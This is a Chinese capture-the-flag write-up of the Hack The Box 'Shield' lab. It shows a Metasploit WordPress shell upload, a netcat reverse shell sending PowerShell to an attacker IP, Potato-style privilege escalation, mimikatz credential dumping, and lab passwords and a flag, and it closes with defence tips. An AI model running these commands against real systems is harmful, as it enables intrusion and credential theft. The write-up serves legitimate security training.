记HACK THE BOX Shield靶场拿flag
字数 1013 2025-08-15 21:34:06
HACK THE BOX Shield靶场渗透实战教学文档
靶场概述
- 目标IP: 10.10.10.29
- 最终目标: 获取flag并提升至管理员权限
- 系统环境: Windows Server 2016
一、信息收集阶段
1. 端口扫描
使用nmap进行初步扫描,发现开放端口:
- 80端口:HTTP服务
- 3306端口:MySQL服务
2. 目录扫描
使用dirsearch工具扫描网站目录结构:
- 发现WordPress CMS系统
- 访问WordPress登录页面:
/wordpress/wp-login.php
二、初始访问
1. WordPress登录
使用已知凭据登录:
- 用户名: admin
- 密码: P@s5w0rd!
2. 获取Webshell
使用Metasploit框架获取Webshell:
msfconsole # 进入Metasploit攻击框架
search wp_admin # 搜索WordPress相关攻击模块
use 0 # 使用编号为0的模块
show options # 查看需要配置的参数
set RHOSTS 10.10.10.29 # 设置目标IP
set USERNAME admin # 设置用户名
set PASSWORD P@s5w0rd! # 设置密码
exploit # 执行攻击
成功获取Webshell,但连接不稳定。
三、稳定连接
1. 上传Netcat
将nc64.exe上传至服务器:
- 上传路径:
C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe
2. 建立稳定连接
在Kali端监听:
nc -lvp 1111
在目标机器上创建批处理文件:
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat
四、权限提升
1. Rotten Potato攻击
利用Windows Server 2016的Rotten Potato漏洞提权:
JP.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
注意:如果1111端口无响应,可尝试其他端口(如4567)。
2. 获取管理员权限
成功执行后,Kali端会收到返回的shell,此时已获得管理员权限。
五、获取Flag
查看目标桌面,获取flag:
6e9a9fdc6f64e410a68b847bb4b404fa
六、横向移动(可选)
1. 使用Mimikatz获取域凭据
上传mimikatz到目标机器,执行以下命令:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
获取到域内其他账户:
- 用户名: sandra
- 密码: Password1234!
关键点总结
- 信息收集:nmap和dirsearch是渗透测试的基础工具
- 已知凭据利用:尝试使用默认或已知凭据登录
- Metasploit使用:快速获取初始访问权限
- 连接稳定性:上传netcat建立稳定连接
- 权限提升:利用Rotten Potato漏洞提权
- 凭证收集:使用mimikatz进行横向移动
防御建议
- 定期更改管理员密码,避免使用弱密码
- 及时更新系统和CMS补丁
- 限制上传文件类型,防止恶意文件上传
- 监控异常进程和网络连接
- 实施最小权限原则,限制服务账户权限